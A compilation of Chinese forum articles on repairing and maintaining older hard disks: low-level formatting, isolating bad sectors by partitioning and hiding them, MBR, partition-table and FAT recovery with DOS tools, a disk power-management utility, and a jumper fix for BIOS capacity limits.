A. 对扇区清零和重写校验值。低格过程中将每个扇区的所有字节全部置零，并将每个扇区的校验值也写回初始值，这样可以将部分缺陷纠正过来。譬如，由于扇区数据与该扇区的校验值不对应，通常就被报告为校验错误（ECC Error）。如果并非由于磁介质损伤，清零后就很有可能将扇区数据与该扇区的校验值重新对应起来，而达到“修复”该扇区的功效。这是每种低格工具和每种硬盘的低格过程最基本的操作内容，同时这也是为什么通过低格能“修复大量坏道”的基本原因。另外，DM中的Zero Fill（清零）操作与IBM DFT工具中的Erase操作，也有同样的功效。
B. 对扇区的标识信息重写。在多年以前使用的老式硬盘（如采用ST506接口的硬盘），需要在低格过程中重写每个扇区的标识（ID）信息和某些保留磁道的其他一些信息，当时低格工具都必须有这样的功能。但现在的硬盘结构已经大不一样，如果再使用多年前的工具来做低格会导致许多令人痛苦的意外。难怪经常有人在痛苦地高呼：“危险！切勿低格硬盘！我的硬盘已经毁于低格！”
C. 对扇区进行读写检查，并尝试替换缺陷扇区。有些低格工具会对每个扇区进行读写检查，如果发现在读过程或写过程出错，就认为该扇区为缺陷扇区。然后，调用通用的自动替换扇区（Automatic reallocation sector）指令，尝试对该扇区进行替换，也可以达到“修复”的功效。
D. 对所有物理扇区进行重新编号。编号的依据是P-list中的记录及区段分配参数（该参数决定各个磁道划分的扇区数），经过编号后，每个扇区都分配到一个特定的标识信息（ID）。编号时，会自动跳过P-list中所记录的缺陷扇区，使用户无法访问到那些缺陷扇区（用户不必在乎永远用不到的地方的好坏）。如果这个过程半途而废，有可能导致部分甚至所有扇区被报告为标识不对（Sector ID not found, IDNF）。要特别注意的是，这个编号过程是根据真正的物理参数来进行的，如果某些低格工具按逻辑参数（以 16heads 63sector为最典型）来进行低格，是不可能进行这样的操作。
E. 写磁道伺服信息，对所有磁道进行重新编号。有些硬盘允许将每个磁道的伺服信息重写，并给磁道重新赋予一个编号。编号依据P-list或TS记录来跳过缺陷磁道（defect track）,使用户无法访问（即永远不必使用）这些缺陷磁道。这个操作也是根据真正的物理参数来进行。
F. 写状态参数，并修改特定参数。有些硬盘会有一个状态参数，记录着低格过程是否正常结束，如果不是正常结束低格，会导致整个硬盘拒绝读写操作，这个参数以富士通IDE硬盘和希捷SCSI硬盘为典型。有些硬盘还可能根据低格过程的记录改写某些参数。
下面我们来看看一些低格工具做了些什么操作：
1. DM中的Low level format：进行了A和B操作。速度较快，极少损坏硬盘，但修复效果不明显。
2. Lformat：进行了A、B、C操作。由于同时进行了读写检查，操作速度较慢，可以替换部分缺陷扇区。但其使用的是逻辑参数，所以不可能进行D、E和F的操作。遇到IDNF错误或伺服错误时很难通过，半途会中断。
3. SCSI卡中的低格工具：由于大部SCSI硬盘指令集通用，该工具可以对部分SCSI硬盘进行A、B、C、D、F操作，对一部分SCSI硬盘（如希捷）修复作用明显。遇到缺陷磁道无法通过。同时也由于自动替换功能，检查到的缺陷数量超过G-list限度时将半途结束，硬盘进入拒绝读写状态。
4. 专业的低格工具：一般进行A、B、D、E、F操作。通常配合伺服测试功能（找出缺陷磁道记入TS），介质测试功能（找出缺陷扇区记入P-list），使用的是厂家设定的低格程序（通常存放在BIOS或某一个特定参数模块中），自动调用相关参数进行低格。一般不对缺陷扇区进行替换操作。低格完成后会将许多性能参数设定为刚出厂的状态。
在这里, 顺便回答一些读者常重复问到的问题：
问1：低格能不能修复硬盘？
答：合适的低格工具能在很大程度上修复硬盘缺陷。
问2：低格会不会损伤硬盘？
答：正确的低格过程绝不会在物理上损伤硬盘。用不正确的低格工具则可能严重破坏硬盘的信息，而导致硬盘不能正常使用。
问3：什么时候需要对硬盘进行低格？
答：在修改硬盘的某些参数后必须进行低格，如添加P-list记录或TS记录，调整区段参数，调整磁头排列等。另外, 每个用户都可以用适当低格工具修复硬盘缺陷，注意：必须是适当的低格工具。
问4：什么样的低格工具才可以称为专业低格工具？
答：能调用特定型号的记录在硬盘内部的厂家低格程序，并能调用到正确参数集对硬盘进行低格，这样的低格工具均可称为专业低格工具

--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


什么样的“坏硬盘”可修复

《一键清理系统垃圾》

什么样的“坏硬盘”可修复

  通常我们可以修复的“坏硬盘”有几种情况：

    1、引导出错，不能正常启动的。这种情况未必是“坏”，通常清除MBR，再重新分区就有70%好。如若不行，应归入第三类。

    2、可正常分区，可格式化，但扫描发现有“B”标记的，也就是通常所说的“出坏道
”。这里可不分“物理坏道”或“逻辑坏道”，“B”数量少的话(少于100个)，基本上有80%可以修复为“好硬盘”。这种情况出需用一些通用的维修软件就可以解决。

    3、不可正常分区，或分区完后格式化不了。这种情况要用到专业维修软件，视不同的牌子，修复率不同。一般达到50%左右。

    4、通电后不转。这种情况一般是电路板故障，换掉电路板IC或整个电路板换掉即可。起转后视不同情况另做处理，60%以上是全好了，但有部分可能同时还有其他几类故障。

    5、自检声正常，BIOS认不到盘。这是多种可能原因造成，如果是电路板接口问题则修电路板；如果是硬盘进入内部保护模式，则需用专业软件切换。Fujitsu硬盘出这种问题较多，修复率约90%。

    6、通电后磁头声敲击不止。这种情况多是因为磁头损坏，但也有不是磁头损坏的。前者若非挽救数据就不必要更换磁头修复，而后者还有50%机会可以挽救。

    7、通电后噪音大。除了少部分可以通过校正主轴解决外，一般不修。

    8、遗忘密码。大部分的硬盘可以设密码保护，如不慎忘记密码，是极难解开的。不过办法还是有的，大部分牌子硬盘都可以用专业软件去除密码保护。

    另外，有些硬盘受破坏严重，坏扇区太多(有的盘不可超过3000，有的则不可超过8000，有些却允许超过10000)，解决办法是切除有问题的磁头，或降低容量，同时更改型号，也算是一个可用的“好硬盘”。这样可以大大提高修复率！

    那么，修后的“好硬盘”与未修过的硬盘有何区别？答曰：对用户来说感觉不到任何区别，非专业人士看不出区别！因为用的就是厂家技术来修复，厂家技术员也未必看得出区别所在！


谈谈硬盘出现物理坏道的迹象及修复技巧

《一键清理系统垃圾》

谈谈硬盘出现物理坏道的迹象及修复技巧

    对于个人电脑用户来说，硬盘的更新频率一般没有CPU 或显示卡那么快--即使要买新硬盘，老硬盘也要挂在机箱里发挥余热，所以人们最不愿意看到硬盘出故障，尤其是当硬盘中保存了珍贵的数据资料时。硬盘属逻辑损坏倒也罢了，大不了重装软件，但物理损坏呢？其实只要情况不是特别严重，用一些方法处理，一般也能解决问题。

    首先来看看硬盘有了物理损伤，也就是有了坏道后有哪些现象：

    1.读取某个文件或运行某个软件时经常出错，或者需要经过很长时间才能操作成功，其间硬盘不断读盘并发出刺耳的杂音，这种现象意味着硬盘上载有数据的某些扇区已坏。

    2.开机时系统不能通过硬盘引导，软盘启动后可以转到硬盘盘符，但无法进入，用SYS命令传导系统也不能成功。这种情况比较严重，因为很有可能是硬盘的引导扇区出了问题。

    3.正常使用计算机时频繁无故出现蓝屏。

    对于前面3种情况，我们一般都有办法作或多或少地补救。以下提供了几种方法来对硬盘的坏道作修复，要注意的是，应该优先考虑排在前面的方法。

    1.首先从最简单的方法入手。在Windows98的资源管理器中选择硬盘盘符，右击鼠标，在快捷菜单中选择 “属性”，在“工具”项中对硬盘盘面作完全扫描处理，并且对可能出现的坏簇作自动修正。对于以上第2种情况即不能进入 Windows98的现象，则可以用Windows98的启动盘引导机器，然后在“A：>”提示符后键入“scand isk X：”来扫描硬盘，其中“X”是具体的硬盘盘符。对于坏簇，程序会以黑底红字的“B”(bad)标出。

    2.实际上，第1种方法往往不能奏效，因为Windows98对“坏道”的自动修复很大程度上是对逻辑坏道而言，而不能自动修复物理坏道，所以有必要考虑对这些坏道作“冷处理”。所谓“冷处理”就是在这些坏道上作标记，不去使用，惹不起还躲得起。记住第1种方法中坏道的位置，然后把硬盘高级格式化，将有坏道的区域划成一个区，以后就不要在这个区上存取文件了。要说明的是，不要为节约硬盘空间而把这个区划得过分“经济”，而应留有适当的余地，因为读取坏道周围的“好道”是不明智的--坏道具有蔓延性，如果动用与坏道靠得过分近的“好道”，那么过不了多久，硬盘上新的坏道又将出现。

    3.用一些软件对硬盘作处理，其中最典型的是PartitionMagic了。这里以5.0版本为例：扫描硬盘可以直接用PartitionMagic5中的“check”命令来完成，但该命令无自动修复功能，所以最好在Pa rtitionMagic5中调用Windows98的相关程序来完成这个任务。标记了坏簇后，可以尝试着对它进行重新测试，方法是在Operations菜单下选择“Advanced/bad Sector Retest”，把坏簇分成一个(或多个)区后，可以考虑把该区隐藏，以免在Windows98中误操作，这个功能是通过Hide Part ition菜单项来实现的。要特别注意的是，如果没有经过格式化而直接将有坏簇的分区隐藏的话，那么该分区的后续分区将由于盘符的变化而导致其中的一些与盘符有关的程序不能正确运行。比如一些软件在桌面上建立的快捷方式将找不到宿主程序，解决之道是利用Tools菜单下的DriveMapper菜单项，它会自动地收集快捷方式和注册表内的相关信息，并对它们作正确的修改。另外，DiskManager这个软件也能做这个工作。隐藏了分区后，不要试图把坏道所在的分区的前后分区合并，因为这两个分区在物理上并不连续。

    4.对于硬盘0扇区损坏的情况，看起来比较棘手，但也不是无药可救--只要把报废的0扇区屏蔽，而用1扇区取而代之就行了，完成这项工作的理想软件是Pctools9.0，具体地说，是Pctools9.0中的DE工具，要注意的是，修改扇区完成后，只有对硬盘作格式化后才会把分区表的信息写入1扇区(现在作为0扇区了)。

    5.不到万不得已，这一招最好不要用：即对硬盘作低格。因为对硬盘作低格至少有两点害处：一是磨损盘片，二是对有坏道的硬盘来说，低格还会加速坏道的扩散。

    6.最后还有一点，那就是主板BIOS的相关内容要设置得当，特别是对于一些TX芯片组级别以前的主板，由于没有自动识别硬盘规格的能力，往往会因设置不当而影响硬盘的使用，轻则硬盘不能物尽其用，重则损伤硬盘。

    以上介绍的是硬盘有物理损伤时的解决方法。但是，这些方法大多数是以牺牲硬盘容量为代价的一种补救措施。硬盘有了坏道，如果不是因为老化问题，则说明平时在使用上有不妥之处，比如对硬盘过分频繁地整理碎片、内存太少以致应用软件对硬盘频频访问等。而忽略对硬盘的防尘处理也会导致硬盘磁头因为定位困难引发机械故障。另外，对CPU超频引起外频增高，迫使硬盘长时间在过高的电压下工作，也会引发故障，所以，平时对硬盘的使用还应以谨慎操作为上策。

    再介绍一款名为“Disk Genius”的软件，它同样是对付硬盘坏道的能手，操作前的准备：

    1、在Windows下制作一张DOS启动软盘。

    2、从www.ccednet.com/soft/cce下载DG，将其解压缩到软盘上。

    如何对付硬盘坏道

    2、在程序中，按键盘上的“Alt”键激活菜单，用左右箭头将其移动到“工具”项，在该选项中选中“硬盘表面检测”，系统提示“测试当前分区硬盘表面？坏扇区清单将保存到BACDSECT.TXT中”

      3、执行扫描，里面共有三个选项，分别为：按扇区扫描、按磁道扫描和按柱面扫描。建议选择“按扇区”扫描，虽然其速度最慢但检测的最全面。

    4、点击“按扇区”进行扫描之后，会弹出扫描进程对话框，扫描到坏道的时候会发出“咯滋、咯滋”的声响，但不一会儿就会扫描过去。完成之后，会出现一个是否有坏扇区、共有几个坏扇区的提示信息

      5、重新启动Windows 98，进入DG软件所在的目录，找到并打开BACDSECT.TXT文件，在这个文件中详细地记录了刚才扫描的结果用笔记录下来，在下面的操作中我们将用到这些信息。

      6、重新用刚才制作的启动盘启动计算机，在DOS下运行DG，把原有的分区删除。操作如下：按下“Alt”键激活DG功能菜单，将其移动到分区菜单项，选择“删除分区”，重复以上操作，将原有分区全部删除。

    7、重建分区：激活菜单后，选择“新建分区”(或建扩展分区)项，根据BADSECT.TXT文件所记录下的坏扇区位置，把坏扇区前后10~20MB的空间单独划分为一个区(这样做是为了给坏道扩散预留一部分空间)。

    “Tab”键在分区时很有用，分好一个区后，记得要按“Tab”键切换到硬盘的其他位置才可以继续分其他的区。分区操作过程中，如果有误也不要紧，该软件提供了“重新加载”命令，可以把硬盘恢复到初始分区状态。因为这个软件在存盘之前的所有操作都只是保存在内存中，所以你可以用多次分区的方法把包含坏道的分区的大小控制在指定的范围之内。在本例中，有坏道的分区的起始柱面为137，结束柱面为164，这样就把坏道(148)包含在其中了。

    8、用“Alt”键将DG菜单激活后，执行分区菜单里的“隐藏”命令，就可以把包含坏道的分区隐藏起来了。然后存盘并退出DG，系统提示分区已改动。

    9、格式化分区：虽然DG自带的有格式化程序，但不推荐使用，建议用启动盘上的“Format”命令对硬盘进行格式化。

    10、如果在对硬盘进行格式化时，系统提示“Track 0 Bad”的话，那么意味着硬盘的0磁道损坏了。一般来说这种故障是难以修好的，但是我们还是不必放弃，说不定还有一线生机。

    其实0磁道损害也是坏道的问题，只不过关键的0磁道也有坏道而已。此时，我们所要做的就是重新标记0磁道的位置。这项工作我们可以交给PCTools 9.0工具包，我们要利用的是其中的DE.EXE命令。

    为了修改0磁道文字，首先要去掉DE的只读属性，我们必须把Configuration下Read Only前的钩消去。随后在主菜单Select中进入Drive type，并选择下一级的Physical→Hard disk。回车之后，我们的主菜单就会出现Partition Table(分区表)，注意找Beginning Cylinder(起始柱面)这一项，它代表硬盘的0柱面开始，也就是0磁道的位置。此时大家只要稍微动一下，把它改为1或者2即可。()

    通过以上操作，我们就完成了隐藏坏道的工作了，怎么样，硬盘是不是又可以正常工作了！


挽救被损硬盘一例

《一键清理系统垃圾》

挽救被损硬盘一例

    近日朋友拿来一台笔记本电脑，C400，4.6G硬盘。发现在使用过程中经常无故死机及非法操作，用多个系统整理、磁盘扫描软件进行操作后故障依旧。决定重装Win98，重新安装后发现问题仍然存在，于是决定对C盘进行彻底格式化再装系统，用Format命令格式化至71％时，硬盘发出异常响声，格式化进程停顿后退出，系统提示“Not ready，Format terminated”，估计是硬盘某一扇区损坏。由于格式化未能完成，故原先安装的Win98仍能启动，使用Win98自带的磁盘扫描软件对C盘进行完全扫描，却未发现任何错误，换用Nonton等磁盘诊断软件对C盘进行诊断也未发现任何问题。再次用启动盘启动后对C盘进行格式化，依旧只能进行到71％。用Fdisk对硬盘重新分区后格式化，问题依旧。最后只能用LFORMAT对硬盘进行低格，过程中也未发现有任何错误，但分区后高级格式化依然不能通过。至此各种方法都已试过，无法解决问题。
    想到每次将2000MB的C盘格式化时都是在71％处失败，估计硬盘在这一区域出现损坏，能否将损坏的这一部分空间挑出，而使用余下的有用空间呢？2000MB的71％为1420MB，估计损坏出现在1400MB－1500MB这个区域中。决定换用PQMAGIC软件，将硬盘分成三个区，大小分别为2014M、2014M、512M，然后用PQMAGIC自带的FORMAT功能对三个分区进行格式化，进程中第一分区的格式化速度极快（相当于Win98中的快速格式化），而其它两个区的格式化速度较慢，并伴有校验及进程显示。结束后发现各盘都已能访问，再次安装Win98及对各盘进行扫描均正常，但使用中仍经常死机，估计问题还是未能解决。再次使用FORMAT命令对C盘进行格式化，验证了刚才的想法。最后只能再次使用PQMAGIC原先设想的容量进行分区，共对硬盘分了四个区，容量分别为1400M、100M、2000M、1024M，退出PQMAGIC，用FORMAT命令对四个分区分别进行格式化，其它三个分区格式化正常，只有估计有损坏空间的100M的分区格式化失败，用PQMAGIC软件重新回到分区列表，将100M的分区的状态（states）设为Hidden后退出。这样计算机的盘符将分别为C、D、E，容量为分别为1440，2013，1027。有损坏区域的硬盘部分被隐藏不用。然后重装Win98，各种软件运行正常，未再发生死机情况。牺牲了100M的硬盘空间后，损坏的硬盘仍可继续使用了。估计多做几次试验，还可将隐藏空间的容量缩减得更小。


挽救硬盘的几个方法

《一键清理系统垃圾》

挽救硬盘的几个方法

    每个用户的硬盘中都存放着大量的有用数据，而硬盘又是一个易出毛病的部件。为了有效的保存硬盘中的数据，除了有效的保存硬盘中的数据，备份工作以外，还要学会在硬盘出现故障时如何救活硬盘，或者提取其中的有用数据，把损失降到最小程度。

1、系统不承认硬盘

此类故障比较常见，即从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE口端口上，硬盘本身的故障率很少 ，可通过重新插拔硬盘电缆或者改换IDE口及电缆等进行替换试验，可很快发现故障的所在。如果新接上的硬盘不承认，还有一个常见的原因就是硬盘上的主从条线 ，如果硬盘接在IDE的主盘位置，则硬盘必须跳为主盘状，

跳线错误一般无法检测到硬盘。

2、CMOS引起的故障

CMOS的正确与否直接影响硬盘的正常使用，这里主要指其中的硬盘类型。好在现在的机器都支持"IDE auto detect"的功能，可自动检测硬盘的类型。当连接新的硬盘或者更换新的硬盘后都要通过此功能重新进行设置类型 。当然，现在有的类型的主板可自动识别硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量 ，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用Normal、LBA、Large等 。如果在一般的模式下安装了数据，而又在CMOS中改为其他的模式，则会发生硬盘的读写错误故障，因为其物理地质的映射关系已经改变 ，将无法读取原来的正确硬盘位置。

3、主引导程序引起的启动故障

硬盘的主引导扇区是硬盘中的最为敏感的一个部件，其中的主引导程序是它的一部分，此段程序主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统 。此段程序损坏将无法从硬盘引导，但从软区或光区之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的fdisk最为方便，当带参数/mbr运行时 ，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，fdisk。exe之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新 ，但硬盘的主引导程序一直没有变化，从DOS 3。x到目前有winDOS 95的DOS，所以只要找到一种DOS引导盘启动系统并运行此程序即可修复 。另外，像kv300等其他工具软件也具有此功能。

4、分区表错误引导的启动故障

分区表错误是硬盘的严重错误，不同错误的程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软区或光区引导系统后可对硬盘读写，可通过fdisk重置活动分区进行修复 。如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32mb的基本DOS分区值为06，而扩展的DOS分区值是05。如果把基本DOS分区类型改为05则无法启动系统 ，并且不能读写其中的数据。如果把06改为DOS不识别的类型如efh，则DOS认为改分区不是 DOS分区，当然无法读写。很多人利用此类型值实现单个分区的加密技术 ，恢复原来的正确类型值即可使该分区恢复正常。分区表中还有其他数据用于纪录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，一般无法进行手工恢复 ，唯一的方法是用备份的分区表数据重新写回，或者从其他的相同类型的并且分区状况相同的硬盘上获取分区表数据，否则将导致其他的数据永久的丢失。在对主引导扇区进行操作时 ，可采用nu等工具软件，操作非常的方便，可直接对硬盘主引导扇区进行读写或编辑。当然也可采用debug进行操作，但操作繁琐并且具有一定的风险。

5、分区有效标志错误引起的硬盘故障

在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节:55aah，此字为扇区的有效标志。当从硬盘，软盘或光区启动时，将检测这两个字节，如果存在则认为有硬盘存在 ，否则将不承认硬盘。此标志时从硬盘启动将转入rom basic或提示放入软盘。从软盘启动时无法转入硬盘。此处可用于整个硬盘的加密技术。可采用debug方法进行恢复处理。另外，DOS引导扇区仍有这样的标志存在 ，当DOS引导扇区无引导标志时，系统启动将显示为:"missing operating system"。其修复的方法可采用的主引导扇区修复方法 ，只是地址不同，更方便的方法是使用下面的DOS系统通用的修复方法。

6、DOS引导系统引起的启动故障

DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括io.sys、msdos.sys、command.com，其中command.com是DOS的外壳文件，可用其他的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows 95携带的DOS 系统中，msdos.sys是一个文本文件，是启动windows必须的文件。但只启动DOS时可不用此文件 。但DOS引导出错时，可从软盘或光盘引导系统，之后使用sys c:传送系统即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。

7、fat表引起的读写故障

fat表纪录着硬盘数据的存储地址，每一个文件都有一组连接的fat链指定其存放的簇地址。fat表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个fat表 ，如果目前使用的fat表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其fat表的长度及第二个fat表的地址也是不固定的，所以修复时必须正确查找其正确位置 ，由一些工具软件如nu等本身具有这样的修复功能，使用也非常的方便。采用debug也可实现这种操作，即采用其m命令把第二个fat表移到第一个表处即可 。如果第二个fat表也损坏了，则也无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用chkdsk或scandisk命令进行修复 ，最终得到*。chk文件，这便是丢失fat链的扇区数据。如果是文本文件则可从中提取并可合并完整的文件，如果是二进制的数据文件 ，则很难恢复出完整的文件。

8、目录表损坏引起的引导故障

目录表纪录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号，目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用上面的chkdsk或scandisk程序的方法 ，从硬盘中搜索出chk文件，由目录表损坏时是首簇号丢失，在fat为损坏的情况下所形成的chk文件一般都比较完整的文件数据，每一个chk文件即是一个完整的文件 ，把其改为原来的名字可恢复大多数文件。

9、误删除分区时数据的恢复

当用fdisk删除了硬盘分区之后，表面现象是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示无效驱动器。如果了解fdisk的工作原理，就会知道，fdisk只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容 。具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变，可仿造上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区即数据 ，但这只限于除分区或重建分区之后。如果已经对分区用format格式化，在先恢复分区后，在按下面的方法恢复分区数据。

10、误格式化硬盘数据的恢复

在DOS高版本状态下，格式化操作format在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区，fat分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变 。这样通过运行"unformat c:"即可恢复原来的文件分配表及目录表，从而完成硬盘信息的恢复。另外DOS还提供了一个miror命令用于纪录当前的磁盘的信息 ，供格式化或删除之后的恢复使用，此方法也比较有效。


我的硬盘会打盹

《一键清理系统垃圾》

我的硬盘会打盹

   随着硬盘价格的不断降低，高转速大容量的硬盘已成为主流。很多人都"鸟枪换大炮"地更换或添置了新硬盘。这样一来，旧的硬盘就成了鸡肋，丢了可惜--还没坏；继续用吧，不仅占空间，而且费电、发热、转速慢！如果这些您还能忍受的话，那即使不读盘也让人讨厌的"哼哼"声，您一定不会无动于衷吧？反正我是不堪其扰！仔细一琢磨，觉得最根本的解决之道就是断电！没错，我们一般都把旧硬盘拿来当备份盘或游戏盘，像我就是把旧的昆腾3.2G拿来装游戏(我可不敢把我那些宝贵的资料搁里面，你想啊，这旧的毕竟是"年老体弱"，指不定那天就"撒手西去"，你舍得把你的宝贵资料当它的陪葬品？)。但毕竟我们的电脑不是游戏机(超级玩家除外)，当我们不玩游戏的时候，那开着这块硬盘岂不是白费电？

    有了思路，接下来就是动手了。不会有人认为我是要在旧硬盘的电源线上装一个开关吧？如果你喜欢我不反对^_^我们知道，Win98的电源管理设置里可以定时关闭硬盘。可一来这定时的时间长短我们无法自定义，二来关闭的是你系统里所挂的所有硬盘，我们无法决定要关哪个，哪个不关。下面就向大家隆重介绍一个小软件--Hard Disk Sleeper(For Windows 95/98/NT)。这家伙虽然只有88KB(打包后)，可这方面的功夫却一点儿也不含糊。它的主要功能就是硬盘电源管理。你可以随时切断一个硬盘的电源，也可以以分钟为单位，利用它的定时功能，让它定时关闭指定的硬盘。

    安装

    Hard Disk Sleeper的安装很简单。把下载下来的压缩包解压后运行setup.exe，无需选择安装路径，软件会自动安装至windows目录下。安装结束后，软件会自动运行，显示图标在系统托盘里，并把自己添加到"开始"菜单的"启动"组中。如果你不希望在电脑启动的时候加载它，你可以将启动组的Hard Disk Sleeper图标删除。

    使用方法

    1. 快速上手

    由于功能比较单一，所以Hard Disk Sleeper的使用也比较简单。用左键单击系统托盘上的图标便会出现如图一的菜单。主菜单分隔符下面的命令是对所有硬盘起作用的；而分隔符上面的各个硬盘的子菜单(你的系统中挂有几个硬盘，就会有相应的几个硬盘子菜单)里的命令，则只针对某一个硬盘。现在我们就可以选择一个目前闲置的硬盘，通过其子菜单中的"立即关闭硬盘"，来马上关闭它。

    2. 进阶设置

    你也许不想马上关闭某个硬盘，而想让它过一会儿再"休息"，这时候，Hard Disk Sleeper的定时功能就大显身手了。Hard Disk Sleeper允许你对所有硬盘使用同一定时设置(如图一主菜单分隔符下的"1分钟后关闭硬盘")，也可以单独对每一个硬盘使用不同的设置(如图一"第2硬盘"子菜单中的"20分钟后关闭硬盘")。

    用鼠标右键单击系统托盘里的Hard Disk Sleeper图标，在弹出菜单中选择"配置" (或直接用左键双击)，出现如图二所示的对话框。在"总体设置"标签中，如果我们选择了"将设置用于所有硬盘"，那么我们就可以勾选"永不关闭"让所有硬盘保持工作状态。也可以设置在若干分钟(最高20分钟)后关闭所有硬盘。这里所设置的值将显示在主菜单中。若勾选"出现启动时自动应用设置"，那么软件启动时会自动应用你所预设的参数，免去了每次使用都需手动设置的麻烦。不过根据我的使用经验，我还是比较习惯手动关闭硬盘。因为你一般难以保证自己在多少分钟后不需访问某个硬盘。如果我们选择"单独配置每个硬盘"则下面方框内的选项都会变灰而不可选。这时，我们就可以单击任一硬盘的标签进行单独设置。硬盘的单独设置与"总体设置"标签里的内容完全一样，大家可以依样画葫芦。

    3.高级设置

    一般来说，Hard Disk Sleeper都能自动准确识别系统中所挂硬盘的状态。但有些硬盘不允许外部程序读取其状态，这时，你就必须自己手动设置硬盘的状态信息。点击"总体设置"标签中的"兼容性"按钮，出现如图三所示的对话框。如果Hard Disk Sleeper无法正确识别你所有硬盘的位置，则你可以在"所有硬盘"标签里进行手动设置，强制使用你的配置。当然，前提是Hard Disk Sleeper无法正常运行，或不起作用的情况下，你可以试试改变硬盘的设置；并且你必须清楚你的硬盘挂在哪个IDE接口上，哪个设为主盘，哪个设为从盘。像我的IDE1接口上接有2个硬盘，主硬盘和从硬盘在Hard Disk Sleeper中被正确识别，并分别显示为第一和第二硬盘。如果你对这些不清楚，我看你还是请教一下高手或干脆放弃使用这个软件。要不然出了什么岔子，我可担待不起^_^。

    如图四，"状态"标签里的内容则是Hard Disk Sleeper自动识别后的硬盘状态。如果Hard Disk Sleeper无法正确识别你的硬盘信息，你可以去掉软件所识别出来的硬盘前的勾，然后切换回"所有硬盘"标签，进行手动设置。

    3. 注意事项

    虽然我们现在可以随心所欲地控制任一硬盘的开闭了，但在下列情况下，操作系统会扫描读取所有硬盘，使得在你不想唤醒已关闭硬盘的情况下自动启动硬盘。我们关闭硬盘的目的是为了节能、降温、减噪，如果频繁地开关硬盘则会大大减少硬盘的使用寿命。所以，在使用这个软件时，我们还是要注意一下一些细节问题，免得让我们的硬盘"长眠不醒"。

⑴关闭硬盘后，启动"资源管理器"。如果你在开启"资源管理器"的情况下，关闭硬盘，然后再关闭"资源管理器"，则系统会保存当前的硬件状态。这时你再启动"资源管理器"，则系统会默认硬件状态没有改变而不扫描硬盘。同理，如果是先关闭硬盘，再启动"资源管理器"，则系统会以为所有硬盘都是开启的，于是便会扫描硬盘，导致已关闭的硬盘重新启动。

⑵打开"回收站"或删除文件(夹)到"回收站"时，系统会扫描硬盘。但如果你直接删除文件，也就是按住"shift"键再删除文件(夹)，则不会有这种情况。原因很简单，每个硬盘分区里都有"回收站"，当你打开 "回收站"时，系统当然要搜索所有硬盘上的回收站内的已删除文件(夹)。而删除文件(夹)则相当于将文件(夹)移动到另一个文件夹中，所以系统也需要读取"回收站"这个特殊的文件夹。

⑶打开ACDSee进行图片浏览时；

⑷在Word这类的文本编辑工具里点击"打开"，显示"文件列表框"时，其实相当于打开一个"资源管理器"，系统也会扫描硬盘；

⑸当你的硬盘处于关闭状态时，如果你关闭Hard Disk Sleeper后再启动它，它便会重新检测系统内的所有硬盘。

⑹若硬盘分区所在的硬盘已被关闭，点击这个(些)分区盘符或指向这个(些)分区内的软件的快捷方式，毫无疑问，都会启动硬盘。

    最后要提醒大家注意的一点，我个人觉得有点奇怪。当你设定若干分钟后关闭硬盘，如果在你退出Hard Disk Sleeper前没有取消这个设定，或点击主菜单中的"永不关闭硬盘"以使硬盘保持运转的话，你下次重启系统或下次开机后，即使你没有运行Hard Disk Sleeper，系统也会自动在你之前设定的若干分钟后关闭你曾设定要关闭的那个硬盘(时间从最后一次对硬盘进行读写操作后起算)。比如说你用Hard Disk Sleeper设定从硬盘3分钟后关闭。硬盘关闭后，你也关闭了Hard Disk Sleeper，但关闭前你没有取消3分钟的定时设定。下次你重启系统(包括关机后重新开机)，你会发现虽然你没有运行Hard Disk Sleeper，但从硬盘还是在没有读写或最后一次读写后的3分钟后自动关闭了！我想可能Hard Disk Sleeper也是通过调用Win98的电源管理程序来实现对硬盘电源控制的吧。


小跳线解决硬盘容量限制

《一键清理系统垃圾》

小跳线解决硬盘容量限制

    近日，朋友把他原有的8.4GB富士通硬盘升级为40GB的希捷酷鱼7200.7硬盘，但由于主板BIOS太老，根本无法检测到新硬盘，当然也就无法使用了。对硬件“一窍不通”的好友只好求助于我。

    其实像这种突破大容量硬盘的解决方法无外乎两种：一是直接升级主板BIOS到最新版本，这样一般就可以解决问题，而且也是最佳的方案；二是通过像DM这样的特殊软件绕过BIOS检测，在系统引导前直接管理硬盘，这种方法虽然很常见也比较实用，但在某些时候会出现意想不到的错误或冲突，因此是一种权宜之计。

    按照上面的思路，我查到主板是技嘉的，于是到其网站上搜索，但无功而返，网站上根本就没有这种主板型号的BIOS更新，看来是太老了；再“跑到”驱动之家碰碰运气，虽然能查到这种型号的BIOS，但也都是较老的版本，没有升级的意义。

